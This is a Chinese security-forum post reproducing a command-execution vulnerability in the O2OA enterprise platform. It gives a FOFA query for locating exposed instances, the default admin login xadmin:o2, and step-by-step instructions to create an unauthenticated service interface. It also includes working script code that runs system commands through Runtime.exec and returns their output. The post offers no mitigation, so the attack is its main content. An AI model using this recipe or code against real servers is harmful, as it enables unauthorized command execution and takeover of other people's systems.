O2OA invoke 命令执行漏洞

漏洞描述

O2OA是一款Java开源企业信息化建设平台,包括流程管理、门户管理、信息管理、数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度。O2OA invoke后台存在命令执行漏洞,攻击者通过漏洞可以获取服务器权限。
 


 

fofa

title=="O2OA"

 


 

漏洞复现

图片[1]-O2OA invoke 命令执行漏洞-孤勇者社区

1.输入默认账户密码登录系统

xadmin:o2

图片[2]-O2OA invoke 命令执行漏洞-孤勇者社区

2.点击左上角图标→服务管理→新增CMD接口→复制如下执行whoami命令代码→启用鉴权选否→保存→点击运行即可得到回显

var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()));
var result = [];

while (true) {
    var oneline = bufReader.readLine();
    result.push(oneline);
    if (!oneline) break;
}
var result = { "Result": result };
this.response.setBody(result, "application/json");

图片[3]-O2OA invoke 命令执行漏洞-孤勇者社区

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞8赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像卡的0
    • 头像机场0